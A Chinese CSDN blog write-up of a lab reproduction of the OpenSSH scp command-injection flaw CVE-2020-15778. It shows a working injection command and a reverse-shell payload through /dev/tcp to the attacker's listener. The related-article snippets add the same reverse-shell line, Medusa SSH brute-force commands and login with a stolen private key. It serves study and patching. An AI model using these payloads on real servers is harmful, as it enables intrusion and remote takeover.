OpenSSH_8.3-命令注入漏洞攻击与修复

最新推荐文章于 2025-02-24 10:01:58 发布
最新推荐文章于 2025-02-24 10:01:58 发布
阅读量8.1k 收藏 31
点赞数 15
文章标签: linux 服务器 centos ssh 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48684274/article/details/109239909
版权
本文详细介绍了OpenSSH 8.3及以下版本的命令注入漏洞(CVE-2020-15778),包括攻击原理、复现步骤、实际攻击测试及GetShell方法。同时,提供了两种防御措施,一是关闭特定网段的SSH访问,二是升级到OpenSSH 8.4p1版本以修复漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

OpenSSH_8.3及以下-命令注入漏洞攻击与修复

漏洞:CVE-2020-15778
2020年6月9日发现漏洞,2020年7月18日公开漏洞。

攻击原理

使用SCP中远程功能进行命令注入。

漏洞复现要求

OpenSSH版本 =<8.3p1

ssh连接密码

攻击环境

攻击方:kali:192.168.0.130

靶机: CentOS7:192.168.0.187

攻击测试

kali:

上传任意文件到靶机上,文件允许为空,因为上传的文件不是主角。而是``里面的命令作为注入点进行攻击。

scp dic.txt root@192.168.0.187:'`touch /tmp/test.txt` /tmp'

命令解读:使用scp将本地文件dic.txt上传到服务器root@192.168.0.187/tmp文件夹,使用``括起来的touch /tmp/test.txt就是注入的命令,会生成一个新的文件test.txt

靶机:

靶机查看/tmp目录下的文件:

[root@localhost tmp]# ls
dic.txt  test.txt

这样就实现了远程命令的执行。

GetShell

kali:

使用命令获取靶机的权限。

#使用一个窗口开启nc进行监听
nc -lvvp 7777
#开启另一个窗口,上传反弹shell的命令
scp dic.txt root@192.168.0.187:'`bash -i >& /dev/tcp/192.168.0.130/7777 0>&1`/tmp/attack.txt'

运行监听:

最低0.47元/天 解锁文章
InVic_Tus
关注
OpenSSH 命令注入漏洞通告(CVE-2020-15778Openssh <=8.3p1)
墨痕诉清风的博客
01-27 1145
漏洞复现简单,漏洞等级 严重。复现需要知道ssh密码,主要针对知道ssh密码却不给登录,这样就可进行反弹shell获取权限了。OpenSSH 命令注入漏洞(CVE-2020-15778) - cs4 - 博客园OpenSSH命令注入漏洞通告(CVE-2020-15778- FreeBuf网络安全行业门户。
漏洞复现】OpenSSH ProxyCommand命令注入漏洞CVE-2023-51385)
李火火的安全圈
12-27 6183
OpenSSHSSH(Secure SHell)协议的免费开源实现。SSH协议族可以用来进行远程控制, 或在计算机之间传送文件。而实现此功能的传统方式,如telnet(终端仿真协议)、 rcp ftp、 rlogin、rsh都是极为不安全的,并且会使用明文传送密码。OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。一个存在于OpenSSH中的命令注入漏洞,攻击者可利用该漏洞注入恶意Shell字符导致命令注入
cve-2008-4834
luuuone的博客
11-13 2316
漏洞cve-2008-4835、cve-2008-4114一致,都属于微软操作系统漏洞ms09-001。 漏洞描述:Microsoft Windows SMB NT Trans请求缓冲区溢出漏洞(MS09-001) 漏洞级别:高 漏洞修复,windows2003 r2操作系统安装WindowsServer2003-KB958687-x86-CHS.exe。 安装成功重启后,再次漏扫,漏洞修复...
OpenSSH 安全漏洞整改
最新发布
Roy32809的博客
02-24 1009
记一次在
OpenSSH_8.3-命令注入漏洞攻击修复(CVE-2020-15778)
sinat_42508733的博客
05-27 1463
OpenSSH_8.3及如下-命令注入漏洞攻击修复 漏洞CVE-2020-15778 2020年6月9日发现漏洞,2020年7月18日公开漏洞。web 攻击原理 使用SCP中远程功能进行命令注入。shell 漏洞复现要求 OpenSSH版本 =<8.3p1安全 ssh链接密码bash 攻击环境 攻击方:kali:192.168.0.130 服务器 靶机: CentOS7:192.168.0.187 ssh 攻击测试 kali:tcp 上传任意文件到靶机上,文件容许为空,由于上传的文件不是主角。而是
漏洞利用-SSH安全防御
我是闲人的博客
03-29 6021
一、SSH修改默认端口 默认情况下,SSH使用22端口。为了安全,一般情况下都会修改默认端口。 修改/etc/ssh/ssh_config文件内容。找到Port ,把原来的22修改成想要的端口,一般修改后的端口比较大。 注意:修改之后必须重新启动SSH服务 二、SSH设置PGP登录 默认情况下,SSH使用用户名和密码进行远程登录。但也可以使用密钥对进行身份验证登录(公钥和私钥)。 这里我就使用xshell生成密钥 Xshell生成密钥 打开Xshell,在菜单栏点击“工具”,在弹出的菜单.
CVE-2020-15778OpenSSH_8.3-命令注入漏洞复现
打工人日记
02-01 2106
攻击方监听端口: #使用一个窗口开启nc进行监听 nc -lvvp 7777 #开启另一个窗口,上传反弹shell的命令 scp dic.txt root@192.168.0.187:'`bash -i >& /dev/tcp/192.168.0.130/7777 0>&1`/tmp/attack.txt' 更改默认shell命令 设zsh为默认shell:chsh -s /bin/zsh 设bash为默认shell: chsh -s /bin/bash 问:不能用zsh反弹
OpenSSH 命令注入漏洞(CVE-2024-15778)修复教程_openssh_8
芯_v_648374雨馨博客
04-18 906
2021年来,云主机进行了漏洞扫描,出现了大量openssh漏洞,我尝试升级过8.4、8.5的版本。16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?
CVE-2020-15778OpenSSH命令注入漏洞复现
m0_48520508的博客
12-08 2349
0x01 简介 OpenSSHSSH(Secure SHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。 0x02 漏洞概述 该漏洞编号CVE-2020-15778OpenSSH8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。 0
OpenSSH命令注入漏洞复现(CVE-2020-15778
热门推荐
千寻的博客
03-06 1万+
漏洞名称 OpenSSH命令注入漏洞 漏洞编号 CVE-2020-15778 漏洞描述 OpenSSH8.3p1及之前版本中scp的scp.c文件存在操作系统命令注入漏洞。 该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。 攻击者可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。 OpenSSH简介 OpenSSHSSH(Secure SHell) 协议的免费开源实现。
漏洞利用-SSH弱口令破解利用
我是闲人的博客
03-26 1万+
一、 Medusa SSH弱口令破解 密码爆破工具:Medusa(美杜莎) 如果在设置SSH服务时,管理员设置了容易被猜解出来的用户名和密码(弱口令)。那么就可以使用对应的密码工具进行暴力破解弱口令。如果设置了非常复杂的话,就算有非常强悍的密码字典文件也没用,毕竟一个个试到猴年马月了。 可以尝试社工。 初级阶段还没学,学到后面再看。。 下面介绍Medusa对指定的ssh服务进行用户名和密码破解。 1. 直接使用用户名和密码字典文件破解 medusa -h IP地址 -u root -P 密码字典文件地址
适用于各种Linux系统漏洞修复的最新OpenSSH8.3p1通用安装包,可用于centos/redhat/ubuntu等
07-13
适用于各种Linux系统的最新OpenSSH8.3p1通用安装包,可编译安装,用于centos、ubuntu、redhat等系统OpenSSH安装及升级。附带了openssl和zlib。
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473CVE-2018-15919)修补文件命令
03-31
通过升级opensshOpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
SSH简单爆破及漏洞利用
qq_45947924的博客
09-16 3774
SSH的环境搭建和banner信息获取比较简单,这里我就没有详细说明了,这里主要是讲一下漏洞利用和安全防御。 1.Medusa SSH弱口令破解 如果在设置SSH服务时,管理员设置了容易被猜解出来的用户名和密码(弱口令)。那么测试人员就可以使用对应的密码工具进行暴力破解弱口令。破解出来就可以使用对应的用户名和密码登录系统。 medusa -h 192.168.0.2 -u root -p 123456 -M ssh #直接输入用户名和密码 medusa -h 192.168.0.2 -u root -P /
OpenSSH 用户名枚举漏洞复现(CVE-2018-15473
千寻的博客
03-06 3273
文章目录漏洞名称漏洞编号漏洞描述影响版本环境搭建漏洞复现修复建议学习笔记链接摘抄 漏洞名称 OpenSSH 用户名枚举漏洞 漏洞编号 CVE-2018-15473 漏洞描述 OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。 该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用
OpenSSH 用户名枚举漏洞 CVE-2018-15473 漏洞复现
Senimo
08-02 1万+
OpenSSH 用户名枚举漏洞 CVE-2018-15473 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞攻击者可以判断某个用户名是否存在于目标主机中。 攻击者可以尝试使用格式错误的数据包(例如,截断的数据包)对用户进行身份验证,并且: 如果用户无效(不存在),则 userauth_pubkey()立即返回,服务器发送 SSH2_MSG_USERAUTH_FAILURE到攻击者;
4.5、漏洞利用-SSH安全防御
c10udz的博客
10-02 934
Linux下可以配置不能使用用户名和密码登录,只是用ssh pgp方式登录,规避ssh暴力破解。修改sshd_config中的PasswordAuthentication 中的yes为no。默认ssh使用用户名和密码进行远程登录,但是也可以使用密钥进行身份验证登录(私钥和公钥)利用iptables对多次连接验证错误,进行账户锁定120s。生成ssh密钥对,使用puttygen。
漏洞利用--SSH私钥免密登陆
qq_43757105的博客
08-28 745
在已知对方SSH私钥id_rsa的情况下,可以利用此漏洞实现免密登陆,具体操作如下: 1.用kali ping 通对方ip 2.在kali上将获取到的id_rsa的权限提高 chmod 500 id_rsa 3.ssh免密登陆 ssh -i id_rsa 用户名@ip ...
openSSH版本升级 安全漏洞修复CVE-2017-15906
qq_38896114的博客
07-08 6054
问题: 1.下载文件:wget "https://openbsd.hk/pub/OpenBSD/OpenSSH/portable/openssh-8.3p1.tar.gz" 2.解压:tar -zxvf openssh-8.3p1.tar.gz 3.cd openssh-8.3p1 4.停止服务:systemctl stop sshd 5.删除历史文件:yum remove openssh -y 6.安装依赖:yum install gcc openssl-devel zlib-devel 7.执行安
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值